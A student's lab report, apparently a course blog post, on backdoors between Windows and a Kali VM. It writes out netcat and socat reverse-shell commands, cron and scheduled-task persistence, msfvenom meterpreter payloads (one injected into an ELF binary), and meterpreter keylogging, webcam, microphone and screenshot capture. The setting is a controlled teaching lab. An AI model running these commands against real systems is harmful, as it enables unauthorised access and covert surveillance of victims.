《网络对抗技术》Exp2 后门原理与实践

目录

Exp2 后门原理与实践

一、实践目标

  • 使用netcat实现win,kali间的后门连接
  • 使用socat实现win,kali间的后门连接
  • meterpreter的应用

二、基础知识问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

误下载带有安全隐患的应用程序或者文件
未及时更新漏洞补丁
使用带有问题的U盘

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win:: 添加至任务计划程序,开机自启动,与其他程序绑定运行,通过注册表启动。
Linux:定时启动,与其他程序绑定后运行,脚本运行。

(3)Meterpreter有哪些给你映像深刻的功能?

屏幕截图,获取击键记录,获取音频,打开摄像头,提权,进程迁移,安装Meterpreter到主机。

(4)如何发现自己有系统有没有被安装后门?

杀毒软件(火绒等)反馈
观察自启动项
观察任务管理器内的进程
观察任务计划程序
观察端口
特征码扫描

三、实验内容

Ⅰ.使用netcat获取主机操作Shell,cron启动

①Windows获取Kali虚拟机的shell

1.查看Windows主机的IP地址
ipconfig

图3.1.1 IP地址
2.在ncat.exe目录下打开cmd监听本机的11204端口
ncat.exe -l -p 11204

图3.1.2 监听
3.kali反弹连接Windows
nc 172.30.1.170 11204 -e /bin/sh

图3.1.3 反弹连接
4.Windows返回kali的shell
ls
whoami
hostname

图3.1.4 验证shell

②Kali虚拟机获取Windows的shell

1.获取Kali虚拟机的IP地址

图3.1.5 IP地址
2.Kali中开启监听
ncat -l -p 11204

图3.1.6 监听
3.Windows反弹连接
ncat.exe -e cmd.exe 192.168.56.101 11204

图3.1.7 反弹连接
4.Kali虚拟机返回Windows的shell
dir

图3.1.8 验证shell

③cron启动

1.Kali中执行crontab -e指令

图3.1.9 第一步
2.设置自启动时间
15 * * * * /bin/netcat 192.168.31.63 11204 -e /bin/sh

图3.1.10 自启动
> 则当主机时间为15分时(每小时的15分),若存在一台ip地址为 192.168.31.63 的主机正在监听11204端口,该主机便可以获取到Kali的Shell
3.Windows主机在指定时间监听
ncat -l -p 11204

图3.1.11 验证自启动功能

Ⅱ.使用socat获取主机操作Shell, 任务计划启动

①Windows获取kali虚拟机的shell

1.Kali开放11204端口
socat tcp-listen:11204 system:bash,pty,stderr

图3.2.1 开放端口
2.Windows连接Kali虚拟机,验证shell功能
socat - tcp:192.168.56.101:11204
ls

图3.2.2 连接并验证i

②Kali虚拟机获得Windows的shell

1.windows的ip地址(变了一次)

图3.2.3 IP地址
2.Windows开放11204端口
socat tcp-listen:11204 exec:cmd,pty,stderr 

图3.2.4 开放端口
3.Kali虚拟机连接Windows
socat - tcp:192.168.31.63:11204

图3.2.5 连接
4.验证shell
dir

图3.2.6验证

③任务计划启动

1.打开任务计划程序,单击创建任务,编辑名称,新建触发器

图3.2.7触发器设置
> 则当主机时间为12:20分(每天)时触发任务
2.新建操作,将socat.exe所在位置填入并添加以下参数,其他选项不变
tcp-listen:11204 exec:cmd,pty,stderr

图3.2.8操作设置
3.测试

时间来到12:20时会弹出如图3.2.9所示的弹窗

图3.2.9 cmd弹窗

然后再Kali虚拟机键入以下命令:

socat - tcp:192.168.31.63:11204

图3.2.10 shell

验证shell

图3.2.11 验证

Ⅲ.使用MSF meterpreter生成可执行文件,利用ncat传送到主机并运行获取主机Shell

①生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=11204 -f exe > shell.exe

图3.3.1 验证

图3.3.2 shell.exe

②利用ncat传送到主机并运行获取主机Shell

1.在Windows的cmd下开始监听11204端口
ncat.exe -l 11204 > shell.exe

图3.3.3 监听
2.Kali虚拟机传送shell.exe
nc 192.168.31.63 11204 < shell.exe

图3.3.4 监听

图3.3.5 传送成功
3.msf打开监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 11204

图3.3.6 msf打开

可以通过show options查看是否修改正确,IP地址与端口号必须与shell.exe中相一致

4.在Windows中打开shell.exe

图3.3.7 shell进程
5.获取主机shell
exploit
dir

图3.3.8 验证

Ⅳ.使用MSF meterpreter获取目标主机音频、摄像头、击键记录等内容,并尝试提权

Ⅰ.尝试提权(失败)

getsystem

图3.4.1 提权

Ⅱ.获取主机键盘击键记录

keyscan_start
//击键
keyscan_dump

图3.4.2 键盘记录

Ⅲ.获取主机摄像头并拍照

webcam_snap

图3.4.3 拍照

图3.4.4 照片

Ⅳ.获取主机音频

record_mic

图3.4.5 录音

Ⅴ.获取主机屏幕截图

screenshot

图3.4.6 截图
fim XXX.jpeg

图3.4.7查看 截图

Ⅴ.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

①注入pwn1

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=11204 -x pwn1 -f elf > pwn11

图3.5.1生成pwn1

②反弹连接

1.在Kali虚拟机中运行程序,打开监听
./pwn11 | nc 192.168.31.63 -e /bin/sh

图3.5.2第一步
2.Windows中监听
ncat.exe -l -p 11204
ls

图3.5.3第二步

四、实验总结与体会

通过这次实验我初步学习了一些有关于后门的知识,第一次接触后门是在信息安全概论课上,但是只知道后门是一些可以使得攻击者可以对系统进行非授权访问的程序,对其危害性认识得不够深刻,经过本次实验对 meterpreter得学习,几乎可以从方方面面窥探他人得隐私,并且学习的门槛不是很高,因此我们一定要在生活中注重对信息安全的保护。

简单来说:网络攻防好!

posted @ 2021-03-13 17:06  20181204王浩博  阅读(86)  评论(0编辑  收藏  举报